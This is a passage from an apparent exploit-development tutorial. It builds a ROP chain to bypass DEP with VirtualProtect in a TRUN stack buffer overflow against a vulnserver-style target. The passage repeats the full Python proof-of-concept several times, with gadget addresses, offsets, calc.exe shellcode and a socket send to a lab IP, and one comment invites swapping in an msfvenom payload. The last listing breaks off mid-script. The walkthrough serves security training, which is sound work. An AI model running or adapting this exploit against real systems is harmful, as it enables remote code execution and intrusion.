The state of the registers after the two ROP gadgets (remember to place breakpoint on the stack pivot ret instruction and step through with F7 in each debugging step):

As you can see from the POC above, the parameters to VirtualProtect are next up on the stack after the first two ROP gadgets are executed. Since we do not want to overwrite those parameters, we simply would like to “jump” over them for now. To do this, we can simply add to the current value of ESP, with an add esp, VALUE + ret ROP gadget. This will change the value of ESP to be a greater value than the current stack pointer (which currently contains the call to VirtualProtect()). This means we will be farther down in the stack (past the VirtualProtect() call). Since all of our ROP gadgets are ending with a ret, the new stack pointer (which is greater) will be loaded into EIP, because of the ret instruction in the add esp, VALUE + ret. This will make more sense in the screenshots that will be outlined below showing the execution of the ROP gadget. This will be the last ROP gadget that is included before the parameters.

Again, looking through the gadgets created earlier, here is a viable one:

0x6ff821d5: add esp, 0x1C ; ret  ;  USP10.dll

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
rop2 = struct.pack('<L', 0xDEADBEEF)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

As you can see, 0xDEADBEEF has been added to the POC. If all goes well, after the jump over the VirtualProtect() parameters, EIP should contain the memory address 0xDEADBEEF.

ESP is 0x01BCF9EC before execution:

ESP after add esp, 0x1C:

As you can see at this point, 0xDEADBEEF is pointed to by the stack pointer. The next instruction of this ROP gadget is ret. This instruction will take ESP (0xDEADBEEF) and load it into EIP. What this means, is that if successful, we will have successfully jumped over the VirtualProtect() parameters and resumed execution afterwards.

We have successfully jumped over the parameters!:

Now all of the semantics have been taken care of, it is time to start getting the actual parameters onto the stack.

Okay, For Real This Time

Notice the state of the stack after everything has been executed:

We can clearly see under the kernel32.VirtualProtect pointer, the return parameter located at 0x19FF9F0.

Remember how we saved our old stack pointer into EAX and ECX? We are going to use ECX to do some calculations. Right now, ECX contains a value of 0x19FF9E4. That value is C hex bytes, or 12 decimal bytes away from the return address parameter. Let’s change the value in ECX to equal the value of the return parameter.

We will repeat the following ROP gadget multiple times:

0x77e17270: inc ecx ; ret  ; kernel32.dll

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

After execution of the ROP gadgets, ECX has been increased to equal the position of return:

Perfect. ECX now contains a value of the return parameter. Let’s knock out lpAddress while we are here. Since lpAddress comes after the return parameter, it will be located 4 bytes after the return parameter on the stack.

Since ECX already contains the return address, adding four bytes would get us to lpAddress. Let’s use ROP to get ECX copied into another register (EDX in this case) and increase EDX by four bytes!

ROP gadgets:

0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  msvcrt.dll
0x77f226d5: inc edx ; ret  ;  ntdll.dll

Before we move on, take a closer look at the first ROP gadget. The mov edx, ecx instruction is exactly what is needed. The next instruction is a pop ebp. This, as of right now in its current state, would kill our exploit. Recall, pop will take whatever is on the top of the stack away. As of right now, after the first ROP gadget is loaded into EIP- the second ROP gadget above would be located at ESP. The first ROP gadget would actually take the second ROP gadget and throw it in EBP. We don’t want that.

So, what we can do, is we can add “dummy” data directly AFTER the first ROP gadget. That way, that “dummy” data will get popped into EBP (which we do not care about) and the second ROP gadget will be successfully executed.

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)


# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

The below screenshots show the stack and registers right before the pop ebp instruction. Notice that EIP is currently one address space above the current ESP. ESP right now contains a memory address that points to 0x50505050, which is our padding.

Disassembly window before execution:

Current state of the registers (EIP contains the address of the mov edx, ecx instruction at the moment:

The current state of the stack. ESP contains the memory address 0x0189FA3C, which points to 0x50505050:

Now, here is the state of the registers after all of the instructions except ret have been executed. EDX now contains the same value as ECX, and EBP contains our intended padding value of 0x50505050!:

Remember that we still need to increase EDX by four bytes. The ROP gadgets after the mov edx, ecx + pop ebp + ret take care of this:

Now we have the memory address of the return parameter placeholder in ECX, and the memory address of the lpAddress parameter placeholder in EDX. Let’s take a look at the stack for a second:

Right now , our shellcode is about 100 hex bytes, or about 256 bytes away, from the current return and lpAddress placeholders. Remember when earlier we saved the old stack pointer into two registers: EAX and ECX? Recall also, that we have already manipulated the value of ECX to equal the value of the return parameter placeholder.

EAX still contains the original stack pointer value. What we need to do, is manipulate EAX to equal the location of our shellcode. Well, that isn’t entirely true. Recall in the updated POC, there is a padding variable of 250 NOPs. All we need is EAX to equal an address within those NOPS that come a bit before the shellcode, since the NOPs will slide into the shellcode.

What we need to do, is increase EAX by about 100 bytes, which should be close enough to our shellcode.

NOTE: This may change going forward. Depending on how many ROP gadgets we need for the ROP chain, our shellcode may get pushed farther down on the stack. If this happens, EAX would no longer be pointing to an area around our shellcode. Again, if this problem arises, we can just come back and repeat the process of adding to EAX again.

Here is a useful ROP gadget for this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We will need two of these instructions. Also, keep in mind- we have a pop ebp instruction in this ROP gadget. This chain of ROP gadgets should be laid out like this:

  • add eax

  • 0x41414141 (padding to be popped into EBP)

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

Now EAX contains an address that is around our shellcode, and will lead to execution of shellcode when it is returned to after the VirtualProtect() call, via a NOP sled:

Up until this point, you may have been asking yourself, “how the heck are those parameters going to get changed to what we want? We are already so far down the stack, and the parameters are already placed in memory!” Here is where the cool (well, cool to me) stuff comes in.

Let’s recall the state of our registers up until this point:

  • ECX: location of return parameter placeholder
  • EDX: location of lpAddress parameter placeholder
  • EAX: location of shellcode (NOPS in front of shellcode)

Essentially, from here- we just want to change what the memory addresses in ECX and EDX point to. Right now, they contain memory addresses- but they are not pointers to anything.

With a mov dword ptr ds:[ecx], eax instruction we could accomplish what we need. What mov dword ptr ds:[ecx], eax will do, is take the DWORD value (size of an x86 register) ECX is currently pointing to (which is the return parameter) and change that value, to make that DWORD in ECX (the address of return) point to EAX’s value (the shellcode address).

To clarify- here we are not making ECX point to EAX. We are making the return address point to the address of the shellcode. That way on the stack, whenever the memory address of return is anywhere, it will automatically be referenced (pointed to) by the shellcode address.

We also need to do the same with EDX. EDX contains the parameter placeholder for lpAddress at the moment. This also needs to point to our shellcode, which is contained in EAX. This means an instruction of mov dword ptr ds:[edx], eax is needed. It will do the same thing mentioned above, but it will use EDX instead of ECX.

Here are two ROP gadgets to accomplish this:

0x6ff63bdb: mov dword [ecx], eax ; pop ebp ; ret  ;  msvcrt.dll
0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

As you can see, there are a few pop instructions that need to be accounted for. We will add some padding to the updated POC, found below, to compensate:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

A look at the disassembly window as we have approached the first mov gadget:

A look at the stack before the gadget execution:

Look at that! The memory address containing the return parameter (filled with 0x4c4c4c4c originally) placeholder was successfully manipulated to point to the shellcode area!:

The next ROP gadget of mov dword ptr ds:[edx], eax successfully updates the lpAddress parameter, also!:

Awesome. We are halfway there!

One thing you may have noticed from the mov dword ptr ds:[edx], eax ROP gadget is the ret instruction. Instead of a normal return, the gadget had a ret 0x000C instruction.

The number that comes after ret refers to the number of bytes that should be removed from the stack. C, in decimal, is 12. 12 bytes would refer to three 4-byte values in x86 (Each 32-bit DWORD memory address contains 4 bytes. 4 bytes * 3 values = 12 total). These types of returns are used to “clean up” items on the stack, by removing items. Essentially, this just removes the next 3 memory addresses after the ret is executed.

In any case- just as pop, we will have to add some padding to compensate. As mentioned above, a ret 0x000C will remove three memory addresses off of the stack. First, the return instruction takes the current stack pointer at the time of the ret 0x000C instruction (which would be the next ROP gadget in the chain) and loads it into EIP. EIP then executes that address as normally. That is why no padding is needed at that point. The 0x000C portion of the return from the now previous ROP gadget kicks in and takes the next three memory addresses removed off the stack. This is the reason why padding for ret NUM instructions are implemented in the NEXT ROP gadget instead of directly below, like pop padding.

This will be reflected and explained a bit better in the comments of the code for the updated POC that will include the size and flNewProtect parameters. In the meantime, let’s figure out what to do about the last two parameters we have not calculated.

Almost Home

Now all we have left to do is get the size parameter onto the stack (while compensating for the ret 0x000C instruction in the last ROP gadget).

Let’s make the size parameter about 300 hex bytes. This will easily be enough room for a useful piece of shellcode. Here, all we are going to do is spawn calc.exe, so for now 300 will do. The flNewProtect parameter should contain a value of 0x40, which gives the memory page read, write, and execute permissions.

At a high level, we will do exactly what we did last time with the return and lpAddress parameters:

  • Zero out a register for calculations
  • Insert 0x300 into that register
  • Make the current size parameter placeholder point to this newly calculated value

Repeat.

  • Zero out a register for calculations
  • Insert 0x40 into that register
  • Make the current flNewProtect parameter placeholder point to this newly calculated value.

The first step is to find a gadget that will “zero out” a register. EAX is always a great place to do calculations, so here is a useful ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Remember, we now have to add padding for the last gadget’s ret 0x000C instruction. This will take out the next three lines of addresses- so we insert three lines of padding:

0x41414141
0x41414141
0x41414141

Then, we need to find a gadget to get 300 into EAX. We have already found a gadget from one of the previous gadgets! We will reuse this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We need to repeat that three times (100 * 3 = 300). Remember, under each add eax, 0x00000100 gadget, to add a line of padding to compensate for the pop ebp instruction.

The last step is the pointer.

Right now, EDX (the register itself) still holds a value that is equal to the lpAddress parameter placeholder. We will increase EDX by four bytes- so it reaches the size parameter placeholder. We will also reuse an existing ROP gadget:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Now, we repeat what we did earlier and create a pointer from the DWORD within EDX (the size parameter placeholder) to the value in EAX (the correct size parameter value), reusing a previous ROP gadget:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Again, that pesky ret 0x000C is present again. Make sure to keep a note of that. Also note the two pop instructions. Add padding to compensate there as well.

Since the process is the exact same, we will go ahead and knock out the flNewProtect parameter. Start by “zeroing out” EAX with an already found ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Again- we have to add padding for the last gadget’s ret 0x000C instruction. Three addresses will be removed, so three lines of padding are needed:

0x41414141
0x41414141
0x41414141

Next we need the value of 0x40 in EAX. I could not find any viable pointers through any of the ROP gadgets I enumerated to add 0x40 directly. So instead, in typical ROP fashion, I had to make-do with what I had.

I added A LOT of add eax, 0x02 instructions. Here is the ROP gadget used:

0x77bd6b18: add eax, 0x02 ; ret  ;  RPCRT4.dll

Again, EDX is now pointed to the size parameter placeholder. Using EDX again, increment by four- to place the location of the flNewProtect placeholder parameter in EDX:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Last but not least, create a pointer from the DWORD referenced by EDX (the flNewProtect parameter) to EAX (where the value of flNewPRotect resides:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Updated POC:

import struct
import sys
import os


import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
